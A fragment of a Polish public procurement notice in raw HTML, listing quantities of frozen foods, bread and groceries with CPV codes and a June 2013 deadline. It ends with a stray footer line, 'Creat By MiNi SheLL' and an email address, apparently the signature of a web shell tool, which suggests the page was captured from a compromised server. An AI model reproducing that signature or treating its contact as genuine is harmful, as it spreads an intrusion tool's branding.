6.	Kalafior                            ( 400 g mrożony)	Szt.	320
7.	Barszcz ukraiński           ( 450 g mrożony )	Szt.	160
8.	Płaty rybne mrożone filet-panga	Kg	150
9.	Kości kulinarne mrożone	Kg	50
10.	Wątróbka drobiowa mrożona	Kg	80
11.	Udziec z kurczaka             ( mrożony, )	Kg	300
12.	Kurczak ( mrożony)	Kg	350
13.	Filet drobiowy    mrożony	Kg	150
14.	Mieszanka kompotowa (450 g)	Szt.	150
15.	Bukiet jarzyn (450 g)( mrożony)	Szt.	450
16.	Dorsz wędzony	Kg	60
17.	Śledź w oleju         (2,0 kg       - wiadro )	Kg	48.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.22.10.00-3, 15.20.00.00-0, 15.33.10.70-9, 15.11.20.00-6, 15.23.40.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa pieczywa w asortymencie i ilości:
1.	Chleb (950g)	Szt.	3350
2.	Chleb owsiany  (400g)	Szt.	1500
3.	Babka (500g)	Szt.	40
4.	Bułka zwykła (100g)	Szt.	7000
5.	Rogal słodki (100g)	Szt.	600
6.	Drożdżówka (90g)	Szt.	500
7.	Kartoflaki  (100g)	Szt.	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.11.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> POZOSTAŁE RÓŻNE ARTYKUŁY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa różnych artykułów spożywczych w asortymencie i ilości:
1.	Amoniak spożywczy( 50 g )	Szt.	2
2.	Herbata indyjska  (100 g)	Szt.	400
3.	Napój herbaciany  w granul. ( 300 g )	Szt.	36
4.	Sól kuchenna (1 kg)	Kg	160
5.	Soda oczyszczona         ( 50 g )	Szt.	5
6.	Olej uniwersalny (1 l)	Szt.	70
7.	Olej uniwersalny    ( 3 l)	Szt.	5
8.	Smalec kostka    (250 g )	Kg	90
9.	Chrzan tarty            ( 270 g )	Szt.	60
10.	Kukurydza konserwowa            ( 400 g )	Szt.	40
11.	Koncentrat pomidorowy 30 % (200g)	Szt.	250
12.	Pasztet drobiowy           ( 290 g )	Szt.	200
13.	Groszek konserwowy            ( 400 g )	Szt.	50
14.	Papryka konserwowa            ( 0,9 l )	Szt.	60
15.	Ogórki konserwowe       ( 0,9 l )	Szt.	60
16.	Cukier kryształ      (1 kg)	Kg	1000
17.	Cukier puder       (0,5 kg)	Kg	15
18.	Kakao naturalne (100 g)	Szt.	70
19.	Rosół kostka           ( 120 g )	Szt.	60
20.	Żurek śląski            ( 46 g )	Szt.	60
21.	Zupa ogonowa         (57g torebki )	Szt.	140
22.	Sos pieczarkowy      (27 g )	Szt.	20
23.	Musztarda  łagodna ( 500 g )	Szt.	25
24.	Majonez ( 850g )	Szt.	30
25.	Ocet 10 % 0,5 l	Szt.	50
26.	Przyprawa w płynie    1,0 l (do zup)	Szt.	100
27.	Przyprawa warzywna w proszku    (  200 g )	Szt.	150
28.	Przyprawa do piernika (20 g )	Szt.	10
29.	Cynamon  (20 g )	Szt.	25
30.	Papryka mielona słodka                     ( 20 g torebki )	Szt.	60
31.	Budyń różne smaki        ( 64 g torebki )	Szt.	600
32.	Ketchup ( 500g )	Szt.	12
33.	Kisiel różne smaki          ( 58 g torebki )	Szt.	200
34.	Kminek                      ( 20 g torebki )	Szt.	10
35.	Kwasek cytrynowy        ( 20 g torebki)	Szt.	120
36.	Pieprz naturalny  mielony                      ( 20 g torebki )	Szt.	200
37.	Proszek do pieczenia                 ( 18 g torebki )	Szt.	50
38.	Cukier waniliowy           ( 16 g torebki )	Szt.	70
39.	Majeranek                       ( 10 g torebki )	Szt.	100
40.	Gałka muszkatołowa         ( 10 g torebki )	Szt.	30
41.	Ziele angielskie              ( 15 g torebki )	Szt.	100
42.	Liść laurowy                   ( 8 g torebki )	Szt.	120
43	Mleko zagęszczone słodzone (530g)	Szt.	72
44.	Wafle tortowe    (150 g )	Szt.	72
45.	Galaretka owocowa    (75 g )	Szt.	400
46.	Rodzynki  (100g )	Szt.	20
47.	Kokos  (100g )	Szt.	20
48.	Drożdże świeże	Kg	2
49.	Sok syrop  ( 0,50 l )	szt.	50
50.	Sok owocowy         ( 0,33 l)	szt.	2500
51.	Sok owocowy b/c                 ( 0,30 l)	szt.	500
52.	Konserwa  tyrolska mięsna  (  300 g )	Szt.	300
53.	Dżem czarna porzeczka              (260 g słoik )	Szt.	150
54.	Marmolada                       ( 950g słoik )	Szt.	20
55.	Mąka pszenna lux                   - poznańska (1 kg )	Kg	400
56.	Mąka ziemniaczana                     ( 0,5 kg )	Kg	20
57.	Kasza manna                      ( 0,5 kg  )	Kg	60
58.	Kasza gryczana                ( 0,5 kg  )	Kg	100
59.	Kasza jęczmienna           ( 0,5 kg  )	Kg	150
60.	Makaron świderki	Kg	50
61.	Makaron lubelski nitka       ( 0,5 kg  )	Kg	50
62.	Bułka tarta                       ( 0,5 kg  )	Kg	20
63.	Groch połówki                ( 0,5 kg  )	Kg	50
64.	Ryż  ( 1 kg  )	Kg	80
65.	Miód pszczeli naturalny                         (400 g słoik )	Szt.	25
66.	Płatki owsiane	Kg	20
67.	Płatki kukurydziane 	Kg	40
68.	Kawa inka (150g)	Szt.	100
69.	Listki waflowe b/c       ( 32 g paczki )	Szt.	1000
70.	Czekolada (100g)	Szt.	200
71.	Czekolada b/c 100g	Szt.	40
72.	Przyprawa-Oregano (10 g)	Szt.	20
73.	Przyprawa -Bazylia (20 g)	Szt.	20
74.	Oliwa z oliwek      (1 l )	Szt.	10
75.	Herbata miętowa ekspresowa (24g)	Szt.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.22.00-6, 15.85.10.00-8, 15.43.00.00-1, 15.84.23.00-5, 15.89.00.00-3, 15.13.10.00-5, 15.80.00.00-6, 15.33.22.90-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com